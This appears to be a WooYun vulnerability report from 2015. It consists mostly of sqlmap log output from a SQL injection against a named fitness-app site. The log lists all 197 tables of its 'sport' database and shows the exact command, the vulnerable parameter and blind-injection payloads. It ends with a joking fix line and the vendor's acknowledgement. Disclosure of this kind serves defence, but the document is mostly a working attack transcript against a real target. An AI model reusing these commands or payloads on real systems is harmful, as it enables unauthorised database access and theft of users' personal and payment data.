[09:30:59] [INFO] retrieved: 19
[09:31:13] [INFO] retrieved: runner_info_del_lkb
[09:31:13] [INFO] retrieving the length of query output
[09:31:13] [INFO] retrieved: 14
[09:31:23] [INFO] retrieved: runner_mc_info
[09:31:23] [INFO] retrieving the length of query output
[09:31:23] [INFO] retrieved: 16
[09:31:35] [INFO] retrieved: runner_tickets64
[09:31:35] [INFO] retrieving the length of query output
[09:31:35] [INFO] retrieved: 10
[09:31:44] [INFO] retrieved: runner_top
[09:31:44] [INFO] retrieving the length of query output
[09:31:44] [INFO] retrieved: 18
[09:32:04] [INFO] retrieved: runner_top_history
[09:32:04] [INFO] retrieving the length of query output
[09:32:04] [INFO] retrieved: 15
[09:32:16] [INFO] retrieved: runner_top_like
[09:32:16] [INFO] retrieving the length of query output
[09:32:16] [INFO] retrieved: 20
[09:32:29] [INFO] retrieved: runner_top_like_step
[09:32:29] [INFO] retrieving the length of query output
[09:32:29] [INFO] retrieved: 15
[09:32:40] [INFO] retrieved: runner_top_step
[09:32:40] [INFO] retrieving the length of query output
[09:32:40] [INFO] retrieved: 17
[09:32:51] [INFO] retrieved: share_reward_info
[09:32:51] [INFO] retrieving the length of query output
[09:32:51] [INFO] retrieved: 17
[09:33:02] [INFO] retrieved: share_reward_stat
[09:33:02] [INFO] retrieving the length of query output
[09:33:02] [INFO] retrieved: 22
[09:33:19] [INFO] retrieved: share_user_reward_info
[09:33:19] [INFO] retrieving the length of query output
[09:33:19] [INFO] retrieved: 18
[09:33:31] [INFO] retrieved: system_notify_info
[09:33:31] [INFO] retrieving the length of query output
[09:33:31] [INFO] retrieved: 20
[09:33:45] [INFO] retrieved: system_notify_record
[09:33:45] [INFO] retrieving the length of query output
[09:33:45] [INFO] retrieved: 11
[09:34:01] [INFO] retrieved: test_detail
[09:34:01] [INFO] retrieving the length of query output
[09:34:01] [INFO] retrieved: 10
[09:34:10] [INFO] retrieved: test_suite 9/10 (90%)
[09:34:10] [INFO] retrieving the length of query output
[09:34:10] [INFO] retrieved: 9
[09:34:16] [INFO] retrieved: test_user
[09:34:16] [INFO] retrieving the length of query output
[09:34:16] [INFO] retrieved: 10
[09:34:25] [INFO] retrieved: theme_info
[09:34:25] [INFO] retrieving the length of query output
[09:34:25] [INFO] retrieved: 14
[09:34:35] [INFO] retrieved: to_send_notify
[09:34:35] [INFO] retrieving the length of query output
[09:34:35] [INFO] retrieved: 11
[09:34:44] [INFO] retrieved: to_send_sms
[09:34:44] [INFO] retrieving the length of query output
[09:34:44] [INFO] retrieved: 21
[09:35:06] [INFO] retrieved: topic_discussion_info
[09:35:06] [INFO] retrieving the length of query output
[09:35:06] [INFO] retrieved: 10
[09:35:13] [INFO] retrieved: topi__info 9/10 (90%)
[09:35:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:35:32] [INFO] retrieved: topic_info
[09:35:32] [INFO] retrieving the length of query output
[09:35:32] [INFO] retrieved: 10
[09:35:40] [INFO] retrieved: topic_like
[09:35:40] [INFO] retrieving the length of query output
[09:35:40] [INFO] retrieved: 16
[09:35:53] [INFO] retrieved: topic_photo_info
[09:35:53] [INFO] retrieving the length of query output
[09:35:53] [INFO] retrieved: 15
[09:36:04] [INFO] retrieved: _opic_tickets64 14/15 (93%)
[09:36:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:36:21] [INFO] retrieved: topic_tickets64
[09:36:21] [INFO] retrieving the length of query output
[09:36:21] [INFO] retrieved: 15
[09:36:34] [INFO] retrieved: tree_donate_num
[09:36:34] [INFO] retrieving the length of query output
[09:36:34] [INFO] retrieved: 18
[09:36:46] [INFO] retrieved: tree_donate_reward
[09:36:46] [INFO] retrieving the length of query output
[09:36:46] [INFO] retrieved: 16
[09:36:57] [INFO] retrieved: tree_donate_stat
[09:36:57] [INFO] retrieving the length of query output
[09:36:57] [INFO] retrieved: 16
[09:37:08] [INFO] retrieved: tree_donate_tree
[09:37:08] [INFO] retrieving the length of query output
[09:37:08] [INFO] retrieved: 16
[09:37:20] [INFO] retrieved: tree_report_user
[09:37:20] [INFO] retrieving the length of query output
[09:37:20] [INFO] retrieved: 13
[09:37:30] [INFO] retrieved: tree_run_info
[09:37:30] [INFO] retrieving the length of query output
[09:37:30] [INFO] retrieved: 9
[09:37:36] [INFO] retrieved: uban_info
[09:37:36] [INFO] retrieving the length of query output
[09:37:36] [INFO] retrieved: 13
[09:37:46] [INFO] retrieved: uban_reg_info
[09:37:46] [INFO] retrieving the length of query output
[09:37:46] [INFO] retrieved: 16
[09:37:58] [INFO] retrieved: upload_tickets64
[09:37:58] [INFO] retrieving the length of query output
[09:37:58] [INFO] retrieved: 13
[09:38:08] [INFO] retrieved: user_activity
[09:38:08] [INFO] retrieving the length of query output
[09:38:08] [INFO] retrieved: 8
[09:38:15] [INFO] retrieved: user_aim
[09:38:15] [INFO] retrieving the length of query output
[09:38:15] [INFO] retrieved: 15
[09:38:26] [INFO] retrieved: user_aim_notify
[09:38:26] [INFO] retrieving the length of query output
[09:38:26] [INFO] retrieved: 9
[09:38:32] [INFO] retrieved: user_bind
[09:38:32] [INFO] retrieving the length of query output
[09:38:32] [INFO] retrieved: 11
[09:38:46] [INFO] retrieved: user__ircle 10/11 (91%)
[09:38:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:38:58] [INFO] retrieved: user_circle
[09:38:58] [INFO] retrieving the length of query output
[09:38:58] [INFO] retrieved: 20
[09:39:12] [INFO] retrieved: user_circle_activity
[09:39:12] [INFO] retrieving the length of query output
[09:39:12] [INFO] retrieved: 12
[09:39:22] [INFO] retrieved: user_contact
[09:39:22] [INFO] retrieving the length of query output
[09:39:22] [INFO] retrieved: 9
[09:39:29] [INFO] retrieved: user_evil
[09:39:29] [INFO] retrieving the length of query output
[09:39:29] [INFO] retrieved: 11
[09:39:38] [INFO] retrieved: user_follow
[09:39:38] [INFO] retrieving the length of query output
[09:39:38] [INFO] retrieved: 11
[09:39:48] [INFO] retrieved: user_friend
[09:39:48] [INFO] retrieving the length of query output
[09:39:48] [INFO] retrieved: 14
[09:39:59] [INFO] retrieved: user_group_run
[09:39:59] [INFO] retrieving the length of query output
[09:39:59] [INFO] retrieved: 19
[09:40:12] [INFO] retrieved: user_group_run_0128
[09:40:12] [INFO] retrieving the length of query output
[09:40:12] [INFO] retrieved: 22
[09:40:28] [INFO] retrieved: user_group_run_del_lkb
[09:40:28] [INFO] retrieving the length of query output
[09:40:28] [INFO] retrieved: 9
[09:40:35] [INFO] retrieved: user_info
[09:40:35] [INFO] retrieving the length of query output
[09:40:35] [INFO] retrieved: 13
[09:40:48] [INFO] retrieved: user_info_tmp
[09:40:48] [INFO] retrieving the length of query output
[09:40:48] [INFO] retrieved: 16
[09:40:59] [INFO] retrieved: user_invite_evil
[09:40:59] [INFO] retrieving the length of query output
[09:40:59] [INFO] retrieved: 11
[09:41:08] [INFO] retrieved: user_launch
[09:41:08] [INFO] retrieving the length of query output
[09:41:08] [INFO] retrieved: 13
[09:41:18] [INFO] retrieved: user_location
[09:41:18] [INFO] retrieving the length of query output
[09:41:18] [INFO] retrieved: 10
[09:41:25] [INFO] retrieved: user_login
[09:41:25] [INFO] retrieving the length of query output
[09:41:25] [INFO] retrieved: 14
[09:41:43] [INFO] retrieved: user_marketing
[09:41:43] [INFO] retrieving the length of query output
[09:41:43] [INFO] retrieved: 16
[09:42:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:42:16] [INFO] retrieved: user_online_info
[09:42:16] [INFO] retrieving the length of query output
[09:42:16] [INFO] retrieved: 21
[09:42:31] [INFO] retrieved: user_online_info_area
[09:42:31] [INFO] retrieving the length of query output
[09:42:31] [INFO] retrieved: 13
[09:42:54] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:43:04] [INFO] retrieved: user_pay_info
[09:43:04] [INFO] retrieving the length of query output
[09:43:04] [INFO] retrieved: 18
[09:43:16] [INFO] retrieved: user_pay_info_cash
[09:43:17] [INFO] retrieving the length of query output
[09:43:17] [INFO] retrieved: 18
[09:43:29] [INFO] retrieved: user_pay_info_mall
[09:43:29] [INFO] retrieving the length of query output
[09:43:29] [INFO] retrieved: 10
[09:43:37] [INFO] retrieved: user_photo
[09:43:37] [INFO] retrieving the length of query output
[09:43:37] [INFO] retrieved: 13
[09:43:48] [INFO] retrieved: user_portrait
[09:43:48] [INFO] retrieving the length of query output
[09:43:48] [INFO] retrieved: 18
[09:44:00] [INFO] retrieved: user_property_info
[09:44:00] [INFO] retrieving the length of query output
[09:44:00] [INFO] retrieved: 25
[09:44:19] [INFO] retrieved: user_reward_custom_record
[09:44:19] [INFO] retrieving the length of query output
[09:44:19] [INFO] retrieved: 30
[09:44:37] [INFO] retrieved: user_reward_custom_record_test
[09:44:37] [INFO] retrieving the length of query output
[09:44:37] [INFO] retrieved: 21
[09:44:51] [INFO] retrieved: user_run_rank_history
[09:44:51] [INFO] retrieving the length of query output
[09:44:51] [INFO] retrieved: 11
[09:45:00] [INFO] retrieved: user_runner
[09:45:00] [INFO] retrieving the length of query output
[09:45:00] [INFO] retrieved: 20
[09:45:14] [INFO] retrieved: user_runner_bracelet
[09:45:14] [INFO] retrieving the length of query output
[09:45:14] [INFO] retrieved: 16
[09:45:25] [INFO] retrieved: user_runner_step
[09:45:25] [INFO] retrieving the length of query output
[09:45:25] [INFO] retrieved: 12
[09:45:36] [INFO] retrieved: user_running
[09:45:36] [INFO] retrieving the length of query output
[09:45:36] [INFO] retrieved: 12
[09:45:46] [INFO] retrieved: user_setting
[09:45:46] [INFO] retrieving the length of query output
[09:45:46] [INFO] retrieved: 14
[09:45:56] [INFO] retrieved: user_tickets64
[09:45:56] [INFO] retrieving the length of query output
[09:45:56] [INFO] retrieved: 14
[09:46:07] [INFO] retrieved: user_week_data
[09:46:07] [INFO] retrieving the length of query output
[09:46:07] [INFO] retrieved: 12
[09:46:17] [INFO] retrieved: user_welcome
[09:46:17] [INFO] retrieving the length of query output
[09:46:17] [INFO] retrieved: 7
[09:46:22] [INFO] retrieved: wangcai
[09:46:22] [INFO] retrieving the length of query output
[09:46:22] [INFO] retrieved: 19
[09:46:35] [INFO] retrieved: wangcai_yingyongbao
[09:46:35] [INFO] retrieving the length of query output
[09:46:35] [INFO] retrieved: 11
[09:46:43] [INFO] retrieved: week_remain
[09:46:43] [INFO] retrieving the length of query output
[09:46:43] [INFO] retrieved: 16
[09:46:55] [INFO] retrieved: yuepao_user_info
Database: sport
[197 tables]
+---------------------------------+
| activity_ads_for_web_new |
| activity_feed_info |
| activity_info |
| activity_intro_photo_info |
| activity_kind_info |
| activity_member |
| activity_photo |
| activity_praise_info |
| activity_property_info |
| activity_score |
| activity_tickets64 |
| address |
| admanager__ads |
| admanager__campaigns |
| admanager__interactions |
| army_passwd |
| army_report_user |
| army_report_user_50 |
| army_report_user_tmp |
| army_run_info |
| bean_qq_upload |
| bean_qq_upload_stat |
| bracelet_msg_table |
| bracelet_msg_template_table |
| bracelet_runner_info |
| bracelet_user_area_stat |
| bracelet_user_plat_stat |
| bracelet_user_run_stat |
| bracelet_user_sex_keyrange_stat |
| bracelet_version |
| cat1 |
| cat2 |
| cat3 |
| circle_activity_info |
| circle_extra_info |
| circle_group_runner_top |
| circle_info |
| circle_stat |
| circle_tickets64 |
| city |
| city_address |
| city_area |
| custom_service_question |
| day_remain |
| day_stat |
| device_info |
| discuss_photo_info |
| discuss_tickets64 |
| discussion_info |
| draw_cash_record |
| draw_reward_record |
| dynamic_feed_discuss |
| dynamic_feed_id |
| dynamic_feed_info |
| dynamic_feed_like |
| enum_index |
| error_stat |
| feed_info |
| feed_photo_info |
| feed_praise_info |
| feed_tickets64 |
| feed_type |
| get_notify |
| get_notify_user_ts |
| group_run_info |
| group_run_stat |
| history_user_day_step |
| history_user_runner_new |
| hundred_batchall_flag |
| hundred_circle_group_run |
| hundred_circle_group_run_extra |
| hundred_circle_group_run_score |
| hundred_group_run_info |
| hundred_host_group_run |
| hundred_user_group_run |
| hx_user_info |
| invite_openid |
| invite_user_info |
| invited_user_info |
| ip_area |
| jiaolian |
| log_query |
| log_report_user |
| mall_buyer |
| mall_circle_product |
| mall_order |
| mall_product |
| mall_product_commit |
| mallorder_tickets64 |
| marathon_run_info |
| marathon_runner_info |
| marathon_team_info |
| marathon_top |
| marathon_user_run_info |
| marathon_user_run_info_bk |
| media__gallery |
| media__gallery_media |
| media__media |
| message_delete |
| message_info |
| message_info_uniq |
| message_tickets64 |
| message_unread |
| month_remain |
| nday_challenge_run_info |
| nday_challenge_user_info |
| nkm_challenge_report_user |
| nkm_challenge_run_info |
| nkm_challenge_user_info |
| nkm_challenge_user_info_city |
| openid_info |
| page |
| phone_code_tickets64 |
| photo_info |
| photo_tickets64 |
| province_city |
| pusher_info |
| pusher_record |
| request_detail |
| run_game |
| runner_info |
| runner_info_del_lkb |
| runner_mc_info |
| runner_tickets64 |
| runner_top |
| runner_top_history |
| runner_top_like |
| runner_top_like_step |
| runner_top_step |
| share_reward_info |
| share_reward_stat |
| share_user_reward_info |
| system_notify_info |
| system_notify_record |
| test_detail |
| test_suite |
| test_user |
| theme_info |
| to_send_notify |
| to_send_sms |
| topic_discussion_info |
| topic_info |
| topic_like |
| topic_photo_info |
| topic_tickets64 |
| tree_donate_num |
| tree_donate_reward |
| tree_donate_stat |
| tree_donate_tree |
| tree_report_user |
| tree_run_info |
| uban_info |
| uban_reg_info |
| upload_tickets64 |
| user_activity |
| user_aim |
| user_aim_notify |
| user_bind |
| user_circle |
| user_circle_activity |
| user_contact |
| user_evil |
| user_follow |
| user_friend |
| user_group_run |
| user_group_run_0128 |
| user_group_run_del_lkb |
| user_info |
| user_info_tmp |
| user_invite_evil |
| user_launch |
| user_location |
| user_login |
| user_marketing |
| user_online_info |
| user_online_info_area |
| user_pay_info |
| user_pay_info_cash |
| user_pay_info_mall |
| user_photo |
| user_portrait |
| user_property_info |
| user_reward_custom_record |
| user_reward_custom_record_test |
| user_run_rank_history |
| user_runner |
| user_runner_bracelet |
| user_runner_step |
| user_running |
| user_setting |
| user_tickets64 |
| user_week_data |
| user_welcome |
| wangcai |
| wangcai_yingyongbao |
| week_remain |
| yuepao_user_info |
+---------------------------------+
[09:46:55] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'
[*] shutting down at 09:46:55
[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" -D sp
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 09:51:08
[09:51:08] [INFO] resuming back-end DBMS 'mysql'
[09:51:08] [INFO] testing connection to the target URL
[09:51:08] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:51:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:51:08] [INFO] retrieved:
[09:51:38] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[09:51:38] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[09:51:42] [WARNING] reflective value(s) found and filtering out
1852068
Database: sport
+------------------+---------+
| Table | Entries |
+------------------+---------+
| yuepao_user_info | 1852068 |
+------------------+---------+
[09:52:47] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'

漏洞证明:

QQ截图20150515100340.png


QQ截图20150515100454.png


QQ截图20150515100553.png


修复方案:

约(yue)跑(pao)吗?

版权声明:转载请注明来源 蛋蛋侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-15 10:58

厂商回复:

多谢反馈, 万分感谢。

最新状态:

暂无


漏洞评价:

评论